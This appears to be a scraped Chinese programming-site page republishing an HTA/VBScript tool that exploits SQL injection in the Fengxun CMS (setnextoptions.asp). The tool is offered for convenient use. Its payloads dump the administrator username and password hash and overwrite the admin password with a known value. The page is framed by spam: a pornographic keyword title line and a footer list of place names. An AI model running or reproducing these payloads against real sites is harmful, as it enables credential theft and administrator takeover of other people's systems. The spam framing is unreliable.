国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > HTML > 正文

風訊注入exp(hta版)代碼發布

2020-01-25 19:40:24
字體:
來源:轉載
供稿:網友
風訊注入exp實例代碼,hta版的方便使用
 
<SCRIPT LANGUAGE="VBScript"> 
Sub Window_onLoad 
    window.resizeTo 450,380 
    window.moveTo 300, 300 
End Sub  
</SCRIPT> 

<SCRIPT LANGUAGE="VBScript"> 
Function getHTTPPage(Path) 
       t = GetBody(Path) 
       getHTTPPage = BytesToBstr(t, "GB2312") 
      document.getElementById("url").innerText=getHTTPPage 
End Function 
</script> 
<SCRIPT LANGUAGE="VBScript"> 
Function GetBody(url) 
      On Error Resume Next 
      Set Retrieval = CreateObject("Microsoft.XMLHTTP") 
      With Retrieval 
          .Open "Get", url, False, "", "" 
          .Send 
           GetBody = .ResponseBody 
      End With 
      Set Retrieval = Nothing 
End Function 

Function BytesToBstr(Body, Cset) 
      Dim objstream 
      Set objstream = CreateObject("adodb.stream") 
       objstream.Type = 1 
       objstream.Mode = 3 
       objstream.Open 
       objstream.Write Body 
       objstream.Position = 0 
       objstream.Type = 2 
       objstream.Charset = Cset 
       BytesToBstr = objstream.ReadText 
       objstream.Close 
      Set objstream = Nothing 
End Function 

</script> 

<title>by lcx</title> 
<input id="urlcode" NAME="urlcode" size="60" value="http://風訊url/user/setnextoptions.asp"> 
<select id="sql" name="sql" onchange=vbs:getHTTPPage(document.getElementById("urlcode").value+document.getElementById("sql").value)> 
<option value="">風訊sql版注入,至于其它備份shell的語句懶得寫了</option> 
<option value="?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理員密碼</option> 
<option value="?EquValue=1&ReqSql=select%201,Admin_Name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理員用戶名</option> 
<option value="?EquValue=1&ReqSql=select user;update FS_MF_ADMIN set ADMIN_pass_word='a0b923820dcc509a' where id=1--">更改管理員密碼為1</option> 
</select> 
<TEXTAREA id="url" NAME="url" ROWS="8" COLS="60"></TEXTAREA> 
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 宜君县| 张家港市| 富蕴县| 丽水市| 赣榆县| 荥经县| 碌曲县| 中宁县| 民乐县| 台东县| 新沂市| 邯郸市| 仁怀市| 义乌市| 九龙城区| 庆云县| 汾西县| 志丹县| 通道| 涿鹿县| 西峡县| 松潘县| 凤山县| 彭州市| 运城市| 鄂尔多斯市| 嵊州市| 长岛县| 岗巴县| 绵阳市| 渑池县| 乌拉特中旗| 南阳市| 和林格尔县| 孝感市| 通山县| 韶关市| 孝感市| 新化县| 特克斯县| 新营市|